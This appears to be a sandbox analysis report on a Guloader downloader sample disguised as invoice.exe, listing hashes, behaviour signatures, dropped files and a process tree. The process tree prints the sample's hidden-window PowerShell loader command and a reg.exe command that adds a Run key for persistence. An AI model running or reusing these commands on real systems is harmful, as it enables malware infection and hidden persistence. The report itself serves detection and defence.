Resubmissions

09-07-2024 12:36

240709-pta39awcnf 10

09-07-2024 11:28

240709-nlhmpatdjh 10

Analysis

  • max time kernel
    361s
  • max time network
    362s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240705-en locale:en-us os:windows7-x64 system
  • submitted
    09-07-2024 12:36

General

  • Target
    invoice.exe
  • Size
    463KB
  • MD5
    5cb973edda7244515c1ddf1f532b67bc
  • SHA1
    e03200f1949f4c85379cb31d2d61165794efb481
  • SHA256
    2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c
  • SHA512
    220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed
  • SSDEEP
    12288:uKYi/LALj3EpUkdwsVZKRukGeYO+NRPNTvJiYn:bFD6rXsgPQhNRPNTxiYn

Malware Config

Signatures

  • Guloader, Cloudeye

    A shellcode-based downloader first seen in 2020.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\invoice.exe
    "C:\Users\Admin\AppData\Local\Temp\invoice.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Udlbstidspunkter=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi';$Subdelegate=$Udlbstidspunkter.SubString(69683,3);.$Subdelegate($Udlbstidspunkter)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe
        "C:\Users\Admin\AppData\Local\Temp\Observerbare86.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1536
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udmund" /t REG_EXPAND_SZ /d "%Internality% -windowstyle minimized $Skibsfart=(Get-ItemProperty -Path 'HKCU:\Backlash\').Preseparated;%Internality% ($Skibsfart)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:1144

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Handelsstandsforeningernes.Toi
    Filesize 68KB
    MD5 9f369129a14ef6d8d0867ec4d9b6eb19
    SHA1 2a56ca0fb0b4590c030d293a7829ac087212821b
    SHA256 9f288ab07bf267422b4670dfd87f373115682a026e63db13e9bab44977c8cc0f
    SHA512 d8fd8aeabfa1bd47f0d3ca2208ac9154496d9b38ef6b185a3c9bf26877539f57a5b0e022c02ae2121a68f74ab13f45f446124dc6d8d90020defd1abeb2825326

  • C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\collinsia\Typehuses.Ver
    Filesize 327KB
    MD5 edd82166d9af4f94ca8413254ad27eee
    SHA1 cbe26db0839f63fc825205293f32660e8fa4b63c
    SHA256 b1246b2938bd2fa73f3a6679ea5040697db9a6ace3607fd2f20c5db2eeecc907
    SHA512 7f25fac516c23cdddfbf8f22e3f29e23c599ceacdfcf5d84531535e7838114bc982bef629ab219c7a17bcbc9ac97f159642297da7e2c1d8fa8d921917986fae8

  • C:\Users\Admin\Desktop\Flyverdragter.lnk
    Filesize 1KB
    MD5 a4240ca5f5d3795a423c50c6e7c436dd
    SHA1 40893606a5fb47d7f46065d230373ea08f8ed496
    SHA256 c543244dfa80165283c6cb6d4a133164b98e7ef022d1bc268c6b56d9addfc83b
    SHA512 bef519e0dfee8a9f628ea402b18b51aeb9b58fe59b121e9dc14384dae56f92e309f32c0ff6fae5a5873f4069043cf184d56d70fb7644cd29481e5174b2d38b1e

  • \Users\Admin\AppData\Local\Temp\Observerbare86.exe
    Filesize 463KB
    MD5 5cb973edda7244515c1ddf1f532b67bc
    SHA1 e03200f1949f4c85379cb31d2d61165794efb481
    SHA256 2926ff4aaaf732eb191704ec4b0b5081c9046b1a08ccf3871b14e7600e07d34c
    SHA512 220f5d5b8677de13495525bc825e048f25dbd9fe829f37e31a64f5ee72cf62945a1d71456a4438f96cd58496289f3cbccb2d7a3ee7fbe1c75e0ee15c93bad9ed

  • \Users\Admin\AppData\Local\Temp\nsyB2AD.tmp\BgImage.dll
    Filesize 7KB
    MD5 350a507070ed063ac6a511aeef67861a
    SHA1 cf647b90a1212e090f1d236d1b50a5010cbf3bae
    SHA256 5c66abd3f06eaa357ed9663224c927cf7120dca010572103faa88832bb31c5ab
    SHA512 cde5747cc8539625e4262afad9699ce4e8325133d7ed7f47b9d46989a7aa0d2cc2488441acc57368f485ef1dd3e02b9ef2faa642f68e9f1db53a39e0f896d468

  • \Users\Admin\AppData\Local\Temp\nsyB2AD.tmp\nsDialogs.dll
    Filesize 9KB
    MD5 13b6a88cf284d0f45619e76191e2b995
    SHA1 09ebb0eb4b1dca73d354368414906fc5ad667e06
    SHA256 cb958e21c3935ef7697a2f14d64cae0f9264c91a92d2deeb821ba58852dac911
    SHA512 2aeeae709d759e34592d8a06c90e58aa747e14d54be95fb133994fdcebb1bdc8bc5d82782d0c8c3cdfd35c7bea5d7105379d3c3a25377a8c958c7b2555b1209e

  • \Users\Admin\AppData\Local\Temp\nsyB2AD.tmp\nsExec.dll
    Filesize 6KB
    MD5 b648c78981c02c434d6a04d4422a6198
    SHA1 74d99eed1eae76c7f43454c01cdb7030e5772fc2
    SHA256 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
    SHA512 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

  • memory/1816-181-0x0000000074421000-0x0000000074422000-memory.dmp
    Filesize 4KB
  • memory/1816-182-0x0000000074420000-0x00000000749CB000-memory.dmp
    Filesize 5.7MB
  • memory/1816-187-0x0000000074420000-0x00000000749CB000-memory.dmp
    Filesize 5.7MB
  • memory/1816-183-0x0000000074420000-0x00000000749CB000-memory.dmp
    Filesize 5.7MB
  • memory/1816-189-0x0000000074420000-0x00000000749CB000-memory.dmp
    Filesize 5.7MB
  • memory/1816-190-0x0000000006720000-0x000000000762B000-memory.dmp
    Filesize 15.0MB
  • memory/1816-184-0x0000000074420000-0x00000000749CB000-memory.dmp
    Filesize 5.7MB
  • memory/1816-195-0x0000000074420000-0x00000000749CB000-memory.dmp
    Filesize 5.7MB
  • memory/2980-196-0x0000000000450000-0x00000000014B2000-memory.dmp
    Filesize 16.4MB
  • memory/2980-216-0x00000000014C0000-0x00000000023CB000-memory.dmp
    Filesize 15.0MB